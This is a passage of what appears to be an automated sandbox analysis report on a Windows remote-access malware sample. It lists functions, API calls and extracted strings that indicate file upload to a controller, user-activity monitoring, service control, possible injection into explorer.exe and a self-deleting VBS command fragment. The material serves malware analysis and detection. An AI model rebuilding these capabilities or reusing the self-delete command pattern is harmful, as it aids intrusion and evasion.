                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                • API String ID: 489098229-65789007
                                                                                • Opcode ID: a8c072eddc43d16634546eb49112b99f784c8a7c138caa42ccdd7806a4b36815
                                                                                • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                • Opcode Fuzzy Hash: a8c072eddc43d16634546eb49112b99f784c8a7c138caa42ccdd7806a4b36815
                                                                                • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                • ExitProcess.KERNEL32 ref: 0040C832
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                • API String ID: 1913171305-390638927
                                                                                • Opcode ID: 5aa952024ef9aabec2160650442929fc7682c2be5f44e6aa354ffde536b1dc2a
                                                                                • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                • Opcode Fuzzy Hash: 5aa952024ef9aabec2160650442929fc7682c2be5f44e6aa354ffde536b1dc2a
                                                                                • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                Function 00788056 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 325fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 007881B3
                                                                                • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00788229
                                                                                • __aulldiv.LIBCMT ref: 00788250
                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00788374
                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0078838F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00788467
                                                                                • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 00788481
                                                                                • CloseHandle.KERNEL32(00000000), ref: 007884BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                • String ID: Uploading file to Controller: $>G
                                                                                • API String ID: 1884690901-111729153
                                                                                • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                                                • Instruction ID: aa930b4104b5bf9abf22c9b4bf1e0a5c50fb95e9859527180aebbe1aa9c1933b
                                                                                • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                                                • Instruction Fuzzy Hash: A7B1C471688340DFC654FB24D859B6FB7E5AF80311F50491DF88993292EF78990ACB93
                                                                                Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                • GetLastError.KERNEL32 ref: 00454A96
                                                                                • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                • GetLastError.KERNEL32 ref: 00454AB3
                                                                                • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                • GetLastError.KERNEL32 ref: 00454C58
                                                                                • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                • String ID: H
                                                                                • API String ID: 4237864984-2852464175
                                                                                • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                Function 0079938F Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00799394
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00799452
                                                                                • Sleep.KERNEL32(000003E8), ref: 007994D4
                                                                                • GetLocalTime.KERNEL32(?), ref: 007994E3
                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 007995CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CreateDirectoryH_prologLocalTime
                                                                                • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                • API String ID: 3069631530-65789007
                                                                                • Opcode ID: a8f8b58d2128b4f531cd6f97798560ad721fb8e33840202611e7dd41891fb402
                                                                                • Instruction ID: d49e3a5d6d40203e0e415f8191ee5f64d849c9779f30603bdc7ad7d7294b0e3e
                                                                                • Opcode Fuzzy Hash: a8f8b58d2128b4f531cd6f97798560ad721fb8e33840202611e7dd41891fb402
                                                                                • Instruction Fuzzy Hash: 4251B071A80258DADF24BBB4DC5AAFE7BB9AB51301F400029F506A7193EF3C5E46C761
                                                                                Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                • GetForegroundWindow.USER32 ref: 0040A467
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                                • API String ID: 911427763-3954389425
                                                                                • Opcode ID: 92517ff7c1db026cdc72d40a39d159beafed97e2b2c730f5804e8a33a61e61a1
                                                                                • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                • Opcode Fuzzy Hash: 92517ff7c1db026cdc72d40a39d159beafed97e2b2c730f5804e8a33a61e61a1
                                                                                • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 65535$udp
                                                                                • API String ID: 0-1267037602
                                                                                • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                • __dosmaperr.LIBCMT ref: 004393CD
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                • __dosmaperr.LIBCMT ref: 0043940A
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                • __dosmaperr.LIBCMT ref: 0043945E
                                                                                • _free.LIBCMT ref: 0043946A
                                                                                • _free.LIBCMT ref: 00439471
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                • String ID:
                                                                                • API String ID: 2441525078-0
                                                                                • Opcode ID: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
                                                                                • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                • Opcode Fuzzy Hash: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
                                                                                • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                Function 007B95C8 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00781D3F,?,00000050,00465290,00000000), ref: 007B9620
                                                                                • GetLastError.KERNEL32(?,?,00781D3F,?,00000050,00465290,00000000), ref: 007B962D
                                                                                • __dosmaperr.LIBCMT ref: 007B9634
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00781D3F,?,00000050,00465290,00000000), ref: 007B9660
                                                                                • GetLastError.KERNEL32(?,?,?,00781D3F,?,00000050,00465290,00000000), ref: 007B966A
                                                                                • __dosmaperr.LIBCMT ref: 007B9671
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00465290,00000000,00000000,?,?,?,?,?,?,00781D3F,?), ref: 007B96B4
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00781D3F,?,00000050,00465290,00000000), ref: 007B96BE
                                                                                • __dosmaperr.LIBCMT ref: 007B96C5
                                                                                • _free.LIBCMT ref: 007B96D1
                                                                                • _free.LIBCMT ref: 007B96D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                • String ID:
                                                                                • API String ID: 2441525078-0
                                                                                • Opcode ID: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                                                • Instruction ID: 30cb7fc9e44e17720b8967cc2325d5517ec926d587c529ec32c97b37728cb408
                                                                                • Opcode Fuzzy Hash: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                                                • Instruction Fuzzy Hash: FF318F7190420AFFDF116FA4DC89EEE3B69EF05364F14016DFA2056151DA39CD60DB61
                                                                                Function 007989BB Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$1$2$3$4$5$6$7
                                                                                • API String ID: 0-3177665633
                                                                                • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                • Instruction ID: 52e341c48b4ffddb3c17eb599c86bff58966bdcc2375319b8305983b155aef2d
                                                                                • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                • Instruction Fuzzy Hash: 8861C2715C9302EED700FF20E856AAA77A4BF96711F44488DF581572E2DF789A08C7A3
                                                                                Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                • TranslateMessage.USER32(?), ref: 00404F30
                                                                                • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                • API String ID: 2956720200-749203953
                                                                                • Opcode ID: 0809b1d592a5ed40a960ac11efc5650e3cf0d4be032a537647f691e6faedb08b
                                                                                • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                • Opcode Fuzzy Hash: 0809b1d592a5ed40a960ac11efc5650e3cf0d4be032a537647f691e6faedb08b
                                                                                • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                Function 007850B9 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 007850D8
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00785188
                                                                                • TranslateMessage.USER32(?), ref: 00785197
                                                                                • DispatchMessageA.USER32(?), ref: 007851A2
                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 0078525A
                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00785292
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                • API String ID: 2956720200-749203953
                                                                                • Opcode ID: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                                                • Instruction ID: 7154f5c338634d5d248e39f223f1a50a8636c29531187d5212b31151634b792a
                                                                                • Opcode Fuzzy Hash: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                                                • Instruction Fuzzy Hash: 7041D671A44700ABCB14FB78DC5E86E77E9AF85710F40092CF906831A6EF38DA06C752
                                                                                Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                • String ID: <$@$@FG$@FG$Temp
                                                                                • API String ID: 1107811701-2245803885
                                                                                • Opcode ID: c712177a3fcf14296a48420873d718a02d4786eed49f0f7e6af701ac92b2a7af
                                                                                • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                • Opcode Fuzzy Hash: c712177a3fcf14296a48420873d718a02d4786eed49f0f7e6af701ac92b2a7af
                                                                                • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                Function 0079708E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 0079718B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00797194
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 007971A3
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00797157
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                • String ID: <$@$@FG$@FG$TUF
                                                                                • API String ID: 1107811701-3315534519
                                                                                • Opcode ID: c09cddb986173b223f0ae78b0a5cb3d5da982f6b9b7ae30d07bc44f4aa3a3996
                                                                                • Instruction ID: e4059ca407b659d5466cab192f7b27a29569c70b1dd5fb8816a395c6b6f38416
                                                                                • Opcode Fuzzy Hash: c09cddb986173b223f0ae78b0a5cb3d5da982f6b9b7ae30d07bc44f4aa3a3996
                                                                                • Instruction Fuzzy Hash: 15319E31E80209DBCF18FBA4DC5EAEE7735AF40311F104169F506660E2EF785A8ACB91
                                                                                Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe), ref: 00406705
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentProcess
                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                • API String ID: 2050909247-4145329354
                                                                                • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: 2c3f92f457844e41ff86450acd5aff28f03427e63226fad44709e0019a985647
